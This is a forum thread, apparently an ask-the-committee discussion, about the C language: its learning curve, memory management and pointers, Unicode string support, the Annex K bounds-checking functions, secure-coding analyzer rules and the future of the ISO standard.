* Why don't we actively promote more higher-level languages which are implemented in C (by fewer people)?


I think that C provides fewer layers of abstraction than other languages. This requires the programmer to deal with memory management, treat strings as arrays of characters, and handle other things that the majority of high-level languages abstract away so that the human mind deals with them more easily. This has advantages and disadvantages: it requires more thought and understanding to write the code, but it also allows the use of low-level features. The lack of tools to solve the learning issues probably comes down to the programmer needing the right conceptual understanding to meet the requirements placed on anyone using the various features of the language.


Do you find the learning curve for C to be high? I find it quite the opposite. It's a simple language with only a few concepts to learn; once you've got those, that's it. There might be some preprocessor tricks you'll pick up later, but the base language and library are pretty comprehensible IMHO.


> It's a simple language with only a few concepts to learn

I mean, by that logic, Assembly could be deemed even simpler, yet writing OR reading programs in Assembly is absolutely not simple at all.

At the end of the day, one has to write programs that solve (complicated) problems, and learning how to do that in C is difficult; thus the learning curve is higher when it comes to writing professional C.

I can guarantee you that writing professional Go or Java and writing correct programs in both takes way less effort than with C, for use cases that would make Go or Java viable.


Modern assembly languages have huge instruction sets, which makes them hard to learn, but the concepts are still easy to learn.


Many antique computers are simulated by SIMH. If you have the corresponding software, you can operate on your desktop a simulated computer's software development system. For example, DEC VAX (VMS or Unix) has a relatively simple and sane assembly language.


I think learning a tiny bit of assembler, even if in an emulator, is very valuable for teaching the basics.


C is indeed a very small language. But the expressive power of C for real-world problems brings a huge learning curve in terms of organization, tracking, and understanding.


Coming from python/js I found it to be high, mostly because of the memory management: making sure I call free correctly, etc. In many cases where I would plow ahead in other languages, with C I had to stop and would feel dread. A lifesaver for me was using C/C++ REPL environments where I could quickly prototype or sanity-check things I was doing.


The trick is to just not use `malloc()` and `free()` unless absolutely necessary ;)


> The trick is to just not use `malloc()` and `free()` unless absolutely necessary ;)

The problem is that often C programmers have to deal with API and libraries they didn't write themselves to solve their problems, thus are forced to use constructors and destructors even when they don't want to.


The syntax of pointers. Easy-to-use high-level languages make extensive use of pointers (i.e., all their variables are actually pointers), but beginners cope with them because no stars or ampersands are required, with the help of GC. Of course, they'll get bitten soon and often, because it is too easy to create copies of pointers rather than copies of full data structures, and without understanding pointers it's hard to grasp why that happens.


I taught myself C from just reading code and trying to contribute to a few projects right out of high school, no books, no school.

So I don't think C has a very high learning curve, C++ on the other hand...


1. When will we get proper strings in the stdlib?

2. When will we get the secure Annex K extensions?

3. When will we get mandatory warnings when the compiler decides to throw away statements it thinks it doesn't need, like memsets or assignments? Compilers are getting worse and worse, and certainly not better.

ad 1) Strings are Unicode nowadays, not ASCII. Nobody uses wchar but Microsoft. Everybody else is using UTF-8, but there's nothing in the standard. Not even search functions with proper casing rules and normalization. Searching for strings should be pretty basic.

ad 2) The usual glibc answer is just bollocks. You either do compile-time bounds checks or you don't. But when you don't, you have to do them at runtime. So it's either the compiler's job or the stdlib's job, but certainly not the user's.


For (2) I guess it depends. Annex K is obviously already a part of the standard so it depends on the implementation. There is a push to eliminate Annex K altogether from the C Standard. If this push fails, it may be the case that more libraries will add support for this optional feature of the language. In the meanwhile, there is the Open Watcom compiler implementation [1], the Safe C Library [2], and Slibc [3].

[1] Watcom C Library Reference Version 1.8. Open Watcom. 2008. ftp://ftp.openwatcom.org/manuals/current/clib.pdf

[2] Safe C Library — A full implementation of Annex K https://github.com/rurban/safeclib/

[3] slibc https://code.google.com/archive/p/slibc/


For (3) mandatory warnings the closest thing is probably ISO/IEC TS 17961:2013. The purpose of ISO/IEC TS 17961 is to establish a baseline set of requirements for analyzers, including static analysis tools and C language compilers, to be applied by vendors that wish to diagnose insecure code beyond the requirements of the language standard. All rules are meant to be enforceable by static analysis. The criterion for selecting these rules is that analyzers that implement these rules must be able to effectively discover secure coding errors without generating excessive false positives.


Going to try to answer these separately. For (1), if you mean strings that are primitive types, my guess is never. We had an hour-long discussion on this topic at a London meeting where we were discussing new features for C11, and my takeaway was that this would never happen, because it would require a significant change to the memory model for the language.


For the u8 type, sure. Nobody needs a new type.

But at least wcsnorm and wcsfc, as I implemented them in safeclib, are required. Not even coreutils, grep, awk, ... can search Unicode strings.

And u8 library variants of the str* and wcs* functions are definitely needed, maybe just taking uchar* instead of char*.


Why would the utilities not handle Unicode searching? Unicode characters match properly, the null terminator works the same, and non-ASCII codes are just one or more opaque 8-bit values which can be compared, copied, etc.


I am sorry to say this, but the C programming language no longer needs the ISO committee, since it introduced non-de-facto-standard features such as VLAs.

For reference I still use The C Programming Language by KERNIGHAN/RITCHIE and The Standard C Library by PLAUGER.

In my view what programmers need the most is good practices rather than any syntactic sugar.

I prefer C rather than any other programming language for its conciseness.

There are opportunities for any new programming language to replace C if it is at least backward compatible with K&R C, 2nd edition (aka ISO C90), and provides portable access to de facto standard hardware acceleration such as SIMD instructions for vector computing.

For now, we have to write SIMD-optimized libraries in assembly language in order to get the full computational power of modern processors.

For programmers who expect C to bring them a hot drink, I would recommend them to stick with the bloated C++ framework which sometimes enlarges your p*s. :-P


No answer but -2 points.

It seems cowards don't have any argument. :-)


A bit off topic, but what are your views on Golang? I'm leaving this pretty open-ended, but I'm curious how you see it interacting with the C/C++ ecosystem in the future.



